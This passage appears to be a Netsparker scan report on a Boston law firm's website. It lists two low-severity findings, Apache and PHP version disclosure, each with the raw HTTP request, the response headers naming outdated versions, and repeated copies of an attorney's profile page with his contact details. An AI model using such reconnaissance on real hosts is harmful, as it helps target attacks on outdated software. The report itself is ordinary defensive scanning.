href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigation: Data Security Breach and Privacy</a></l..
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /attorneys.php

/attorneys.php

http://www.nutter.com/attorneys.php?AttorneyID=79

Extracted Version

1.3.42

Request

GET /attorneys.php?AttorneyID=79 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:09:20 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Jonathan L. Kotlier : Attorneys : Nutter McClennen & Fish LLP--> <title>Jonathan L. Kotlier, Partner: Attorney Litigation Department: Government Enforcement Defense: Boston</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="Jonathan L. Kotlier partner Attorney Litigation Department Government Enforcement Defense practice U.S. Attorney Office Chief Economic Crimes Massachusetts white collar criminal cases securities investor computer crimes telemarketing fraud" /> <meta name="description" content="Jonathan L. Kotlier is a partner, Attorney in the Litigation Department and a member of the Government Enforcement Defense practice group. From U.S. Attorney�s Office, he was Chief of Economic Crimes Unit for the District of Massachusetts." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<div id="Information"> <img src="http://www.nutter.com/media/attorneys/media.75.jpg" title="Jonathan L. Kotlier" alt="Jonathan L. Kotlier"/> <h2 id="Name">Jonathan L. Kotlier</h2> <p> <span id="attTitle">Partner </span> Seaport West
<br/>155 Seaport Boulevard<br /><span id="Address">Boston, MA 02210</span> <span>617-439-2683 Fax: 617-310-9683</span> <span><a href="email.php?email=jkotlier@nutter.com" title="jkotlier@nutter.com" target="emailnotice" onclick="emailNotice();">jkotlier@nutter.com</a></span> <a href="email.php?email=jkotlier@nutter.com" title="jkotlier@nutter.com" target="emailnotice" onclick="emailNotice();" class="Email"><span>jkotlier@nutter.com</span></a> <span><a href="vcard.php?AttorneyID=79" title="V-Card" id="vCard">V-card</a></span> </p></div><h3 id="Focus"> <span id="Title">Areas of focus:</span> <span id="Desc"><a href="http://www.nutter.com/client_services.php?PracticeID=19">Litigation</a> and <a href="http://www.nutter.com/client_services.php?PracticeID=11">Government Investigations and White Collar Defense</a></span> <img src="http://www.nutter.com/media/images/print_backbar_blue.gif" id="bgFocus"/></h3><div id="Related"><h4>EDUCATION</h4><ul class="noBullets"><li>Boston University School of Law, J.D.</li><li>University of Chicago, M.A.</li><li>University of Pennsylvania, B.A.</li></ul><h4>ACCOLADES</h4><ul id="Accolades" class="noBullets"><li>Massachusetts Super Lawyer, 2005-2010</li><li>Super Lawyers, Corporate Counsel Edition, 2009 & 2010</li><li>The Best Lawyers in America, 2008-2011</li><li>Member, Judicial Nominating Commission, by appointment of Governor Deval L. Patrick (2008 - )</li></ul><h4>ADMISSIONS</h4><ul class="noBullets"><li>Massachusetts</li><li>New York</li><li>Pennsylvania</li></ul><h4>ARTICLES &amp; EVENTS</h4><ul><li><a href="http://www.nutter.com/publications_events.php?NewsID=1215" title="Jonathan Kotlier participates in ABA's panel �How to Handle a Government Subpoena� at the Business Law Section 2011 Spring Meeting">Jonathan Kotlier participates in ABA's panel �How to Handle a Government Subpoena� at the Business Law Section 2011 Spring Meeting<br /></a></li><li><a href="http://www.nutter.com/publications_events.php?NewsID=1207" title="Jonathan Kotlier and Ian Roffman participate in BBA�s program �Securities Enforcement: What's Up at the SEC: Whistleblowing, Insider Trading, and the FCPA�">Jonathan Kotlier and Ian Roffman participate in BBA�s program �Securities Enforcement: What's Up at the SEC: Whistleblowing, Insider Trading, and the FCPA�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1156" title="Jonathan Kotlier moderates BBA panel �Meet the Massachusetts Securities Division�">Jonathan Kotlier moderates BBA panel �Meet the Massachusetts Securities Division�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1050" title="Jonathan Kotlier appointed co-chair of the Boston Bar Association�s Criminal Justice Section">Jonathan Kotlier appointed co-chair of the Boston Bar Association�s Criminal Justice Section<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1042" title="Jonathan Kotlier and Benjamin Mack publish �The SEC�s new cooperation initiative: Closer coordination with DOJ could have collateral upsides for defendants�">Jonathan Kotlier and Benjamin Mack publish �The SEC�s new cooperation initiative: Closer coordination with DOJ could have collateral upsides for defendants�<br /><em>Westlaw Journal White-Collar Crime</em></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=992" title="Jonathan Kotlier and Ian Roffman participate in the BBA�s program �Securities Fraud 2010: The �New Deal� at the SEC, Insider Trading, and a White Collar Trial�">Jonathan Kotlier and Ian Roffman participate in the BBA�s program �Securities Fraud 2010: The �New Deal� at the SEC, Insider Trading, and a White Collar Trial�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=819" title="Jonathan Kotlier and Ian Roffman participate in BBA program �Securities Fraud 2009: Madoff, Trials, and the SEC's View on Enforcement�">Jonathan Kotlier and Ian Roffman participate in BBA program �Securities Fraud 2009: Madoff, Trials, and the SEC's View on Enforcement�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=742" title="Jonathan Kotlier and Ian Roffman present at ECOA 2008 Annual Business Ethics and Compliance Conference">Jonathan Kotlier and Ian Roffman present at ECOA 2008 Annual Business Ethics and Compliance Conference<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=678" title="Jonathan Kotlier appointed to Judicial Nominating Commission">Jonathan Kotlier appointed to Judicial Nominating Commission<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=655" title="Jonathan Kotlier and Ian Roffman host ECOA's webinar on personal liability for compliance professionals">Jonathan Kotlier and Ian Roffman host ECOA's webinar on personal liability for compliance professionals<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=644" title="Jonathan Kotlier moderated BBA seminar on SEC Practices and Investigations">Jonathan Kotlier moderated BBA seminar on SEC Practices and Investigations<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=553" title="Jonathan Kotlier publishes article on options backdating investigations">Jonathan Kotlier publishes article on options backdating investigations<br /><em>New England In-House</em></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=467" title="Jonathan Kotlier moderates BBA panel on options backdating investigations">Jonathan Kotlier moderates BBA panel on options backdating investigations<br /></a></li><li class="toggle"><span id="articleArrow"><img src="media/images/down_arrow.gif" width="6" height="6"></span> <a href="javascript:toggleDisplay('temp_articles','articleButton','articleArrow')"><span id="articleButton">More</span></a></li></ul></div><div id="NarrativeText"><p>Jonathan L. Kotlier is a partner in the Litigation Department and a member of the Government Investigations and White Collar Crime practice group. Jonathan joined the firm in 2004 from the U.S. Attorney&rsquo;s Office where, for eight of his twelve years, he was Chief of the Economic Crimes Unit. <br /></p><p>Since joining Nutter, Jonathan has represented several corporations and individuals in white collar criminal and complex civil cases and investigations involving alleged securities fraud, health care fraud, environmental crimes, government contracting fraud, and False Claims Act violations. Much of his work has been in the area of defending securities related actions involving accounting fraud issues. He has also conducted internal investigations on behalf of corporations and special litigation committees. He frequently represents individuals and corporations before the Securities and Exchange Commission. <br /></p><p>Recently, Jonathan won the dismissal of a securities fraud complaint against a bond underwriter, which was upheld by the First Circuit Court of Appeals. Some of his other recent representatio..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /attorneys.php

/attorneys.php

http://www.nutter.com/attorneys.php?AttorneyID=79

Extracted Version

PHP/4.4.9

Request

GET /attorneys.php?AttorneyID=79 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:09:20 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Jonathan L. Kotlier : Attorneys : Nutter McClennen & Fish LLP--> <title>Jonathan L. Kotlier, Partner: Attorney Litigation Department: Government Enforcement Defense: Boston</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="Jonathan L. Kotlier partner Attorney Litigation Department Government Enforcement Defense practice U.S. Attorney Office Chief Economic Crimes Massachusetts white collar criminal cases securities investor computer crimes telemarketing fraud" /> <meta name="description" content="Jonathan L. Kotlier is a partner, Attorney in the Litigation Department and a member of the Government Enforcement Defense practice group. From U.S. Attorney�s Office, he was Chief of Economic Crimes Unit for the District of Massachusetts." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<div id="Information"> <img src="http://www.nutter.com/media/attorneys/media.75.jpg" title="Jonathan L. Kotlier" alt="Jonathan L. Kotlier"/> <h2 id="Name">Jonathan L. Kotlier</h2> <p> <span id="attTitle">Partner </span> Seaport West
<br/>155 Seaport Boulevard<br /><span id="Address">Boston, MA 02210</span> <span>617-439-2683 Fax: 617-310-9683</span> <span><a href="email.php?email=jkotlier@nutter.com" title="jkotlier@nutter.com" target="emailnotice" onclick="emailNotice();">jkotlier@nutter.com</a></span> <a href="email.php?email=jkotlier@nutter.com" title="jkotlier@nutter.com" target="emailnotice" onclick="emailNotice();" class="Email"><span>jkotlier@nutter.com</span></a> <span><a href="vcard.php?AttorneyID=79" title="V-Card" id="vCard">V-card</a></span> </p></div><h3 id="Focus"> <span id="Title">Areas of focus:</span> <span id="Desc"><a href="http://www.nutter.com/client_services.php?PracticeID=19">Litigation</a> and <a href="http://www.nutter.com/client_services.php?PracticeID=11">Government Investigations and White Collar Defense</a></span> <img src="http://www.nutter.com/media/images/print_backbar_blue.gif" id="bgFocus"/></h3><div id="Related"><h4>EDUCATION</h4><ul class="noBullets"><li>Boston University School of Law, J.D.</li><li>University of Chicago, M.A.</li><li>University of Pennsylvania, B.A.</li></ul><h4>ACCOLADES</h4><ul id="Accolades" class="noBullets"><li>Massachusetts Super Lawyer, 2005-2010</li><li>Super Lawyers, Corporate Counsel Edition, 2009 & 2010</li><li>The Best Lawyers in America, 2008-2011</li><li>Member, Judicial Nominating Commission, by appointment of Governor Deval L. Patrick (2008 - )</li></ul><h4>ADMISSIONS</h4><ul class="noBullets"><li>Massachusetts</li><li>New York</li><li>Pennsylvania</li></ul><h4>ARTICLES &amp; EVENTS</h4><ul><li><a href="http://www.nutter.com/publications_events.php?NewsID=1215" title="Jonathan Kotlier participates in ABA's panel �How to Handle a Government Subpoena� at the Business Law Section 2011 Spring Meeting">Jonathan Kotlier participates in ABA's panel �How to Handle a Government Subpoena� at the Business Law Section 2011 Spring Meeting<br /></a></li><li><a href="http://www.nutter.com/publications_events.php?NewsID=1207" title="Jonathan Kotlier and Ian Roffman participate in BBA�s program �Securities Enforcement: What's Up at the SEC: Whistleblowing, Insider Trading, and the FCPA�">Jonathan Kotlier and Ian Roffman participate in BBA�s program �Securities 